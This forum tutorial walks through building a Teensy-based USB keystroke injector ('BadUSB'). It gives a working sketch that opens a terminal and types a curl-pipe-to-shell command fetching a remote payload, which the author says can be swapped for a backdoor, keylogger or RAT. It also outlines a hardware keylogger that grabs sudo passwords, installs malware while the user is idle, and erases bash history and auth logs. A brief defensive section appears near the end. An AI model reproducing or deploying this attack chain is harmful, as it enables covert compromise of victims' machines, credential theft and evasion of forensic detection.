Continuing the discussion from Plug In To Win - DIY Bad USB [Part 3/3]:
You may have read the awesome “Plug In To Win” series from @TheDoctor. It make me recall some experiments I did time ago on HID injection. After some private chat, we agreed to release this extra post to present one more HW alternative to this “keyboard injection” attacks. You may have already seen the code in the last part of @TheDoctor series… this goes a bit more in detail.
In this paper I will describe how to reproduce the Rubber Ducky HID injection scenario using a small microcontroller board know as Teensy. I’m using a Teensy 3.0 in this paper, but any other version should just work fine. The Teensy LC (Low Cost) cost around $12… so it is a very affordable device.
Functionally, the Teensy works just like an Arduino, however, from its first versions, the Teensy included the capability to simulate USB HID devices. HID stands for Human Interface Device that is, keyboards, mouses and joysticks.
The easiest way to program the Teensy, is to install the Arduino IDE and then upgrade it with the Teensyduino package. This will give you access to a lot of Arduino enable libraries and allow you to get the most out of your little Teensy board. The installation uses a standard graphical wizard… cannot be easier.
Test Environment
For testing this PoC, we are going to use a local HTTP server able to serve some backdoor/malware SW. Same concept used on Part1 of @TheDoctor’s series. You can use your own server on the Internet if you want to. This local server solution will let you play with this idea even if you do not have a server on the Internet…
So this is how I did set it up:
$ cd /tmp
$ mkdir server
$ cd server
$ cat << EOM > b.sh
xeyes &
EOM
$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Yep, this devastating malware launches xeyes and those little eyes will stare at you for the rest of the day… That’s scary man!
In order to download and run the b.sh uber-malware we should run something like this:
$ curl -s http://127.0.0.1:8000/b.sh | /bin/sh
Change b.sh to suit your needs (install a backdoor, keylogger, RAT,…), and 127.0.0.1 to whatever server you want to use.
The Teensy Script
The Teensy script is very simple. As with the USB Rubber Duck you have some functions to simulate different keys press and release events. In this script, we are assuming that the target machine is running the default Ubuntu Desktop. In this desktop, you can open a terminal by pressing CTRL+ATL+T. For other environments you may need to change the script… Yep, this is just a PoC. You can close a terminal pressing CTRL+D… so, knowing this, the script will look like this:
void release_keys (void)
{
// Release all keys
Keyboard.set_modifier (0);
Keyboard.send_now();
delay (100);
}
void setup() {
// put your setup code here, to run once:
delay (1000);
// Launch terminal (GNOME CTRL+ALT+t)
Keyboard.set_modifier (MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
delay (100);
Keyboard.press(KEY_T);
Keyboard.release(KEY_T);
delay (500); // Wait for the terminal to come up
release_keys ();
// Send Command
Keyboard.println("curl -s http://127.0.0.1:8000/b.sh | /bin/sh");
// Close terminal (CTRL+D)
Keyboard.set_modifier (MODIFIERKEY_CTRL);
Keyboard.send_now();
delay (100);
Keyboard.press(KEY_D);
Keyboard.release(KEY_D);
delay (100);
release_keys ();
}
You can find more details on how to use the teensy in https://www.pjrc.com/teensy/td_keyboard.html
I think the code is pretty straightforward to understand. However a couple of comments may help:
- The
CTRL,ALT,SHIFT,… keys are usually pressed together with other keys. These keys are usually known as modifiers and we can press many of them at the same time. So, we have to use theset_modifiermethod fromKeyboard, to activate and deactivate the use of those keys. - Note that, once a modifier key is activated, it will remain activated until we release it. That is what the
release_keysfunction does… we make it into a function because we have to call it at least twice in the code. - Finally, whenever you press a single key… you also have to release it.
This is it. Upload the sketch to the Teensy and then, whenever you plug it into a Ubuntu machine, it will bring up a Terminal Emulator, download and run some code form a remote server and then close the terminal. Of course, if the screen is locked then this system will just type funny user names and passwords.
Fine Tuning
You may have noted different delay calls in the sketch. You may need to adjust them. The values in the script worked fine with may machine, but they are quite in the limit. You may need to increase them to safer values.
Some notes on the timing:
- The first delay accounts for the time it takes to the computer to identify the USB device, load the driver (if needed) and create the entry at
/dev/. Depending on the computer and its load, this may happen immediately, or may take up to a few seconds. - Same happens with the Terminal. Usually you get a terminal immediately when you press
CTRL+ALT+T. However, if the machine is heavy loaded, that may take also a few seconds. If the terminal is not there when we type our command in the next line… then the command will just not be executed. - During the testing I noticed that, whenever I use individual keys I need to wait a bit before sending the next keystroke to the computer.
As a rule of thumb… try to mimic in your program the way you type in your computer… that should work.
Jumping into Real World
All this is very cool, but in real world things are not that easy. A decent user will lock its computer when s/he is away and will not use a privileged user account for normal work. This limits this attack to:
- being skilled enough to plug the device in the computer when the user is in front of you and also to keep the user sight away from the screen, so s/he will not notice the popping terminal in the screen.
- do whatever is doable with a normal user account.
So, you are, in best case, restricted to whatever you could do if you have got physical access to the machine. In a proper configured machine, that is not much.
In those case you have to go one step forward. I haven’t tried any of them, so I’m looking forward to you guys to implement them and report back in this thread.
Getting a Ring 0 Malware Installed
In order to do this, you need to get Administrator access, either getting the Administrator password or running some local exploit. The local exploit scenario is pretty straightforward, just change b.sh for your exploit and run it. For getting the Administrator password we still have a couple of options:
-
Make the
b.sha custom keylogger that will detect when thesudocommand is entered and then it will capture the password. After that you have to instruct the external device to run a new script to install your software usingsudoand the password it has just got. For that, we may need to configure the Teensy using a composite gadget driver making it behave as a keyboard and serial port at the same time. -
Build a physical key logger that sits between the user keyboard and the computer. In this case the device will capture keystrokes waiting for a
sudocommand and grabbing the password (pretty much the same). Then it will inject the command afterwards… for instance after some inactivity period.
In general, the lock screen password is the same that the user password, that is the same that the sudo password. So, once the password is acquired, screen locked is no longer a problem.
A Smart HW Key Logger
Let’s focus in the last case. Building a HW key logger that can inject Administrator commands based on some conditions. If I had to build such a thing I would:
- Grab one of those Arietta G25 boards. It is damn small and has extra USB ports on addition to the USB OTG port we need to simulate the HID device.
- Plug the system keyboard in one of the USB ports in the expansion header (this needs some basic soldering skills)
- Plug the USB OTG (the microUSB connector) to the computer you want to sniff the keyboard
- Configure the OTG port as a HID keyboard… ideally mimicking the vendor/product ID from the original keyboard
- Write a small program to capture the RAW keyboard events (probably just reading
/dev/input/whatever) and then feed them into the HID device to effectively send the keyboard events to the computer.
This small program will capture all key strokes, detect when a sudo command gets typed by the user, capture the sudo key… wait until there is no keyboard activity for let’s say 10 minutes… and then type the commands needed to install the malware.
The script should, in addition to installing whatever, clean up the bash history and also the system logs (at least /var/log/auth for Debian based systems) so the sudo command does not get noticed.
Anybody eager to try!.. please let me know if it works.
Protecting Yourself
Protecting yourself against this kind of attack requires to take seriously physical security. If somebody can get to your computer and plug things in it without you noticing it… well, they can do basically anything they want. And it is hard to detect.
For this specific kind of attack:
- Keep your USB ports visible so you will have more chances to notice if a HW keylogger is plugged in
- Keep your computer in such a place that makes difficult the access to the USB ports.
- Run some software that checks Vendor/Product ID for your keyboard. This can be faked, but the attacker has to figure it out
- No not allow anybody to touch your computer… specially if you are not around
Despite of the obviously bad usages of this concept, this kind of devices may be very useful, specially to quickly do something on a server machine. Think about switching off a server that does not have a keyboard or screen. You may go and grab some in order to type shutdown, or you can program your little device with that command, plug it in and get the thing done in seconds. What about building a custom keyboard for your preferred game? … there are lots of useful and legit applications for a device that can simulate a USB HID!
Hack fun!
P.S.: You can do this same thing using an Arduino Leonardo, a BeagleBone Black, your Android phone or a Rpi Zero… just to name a few
The 
- as always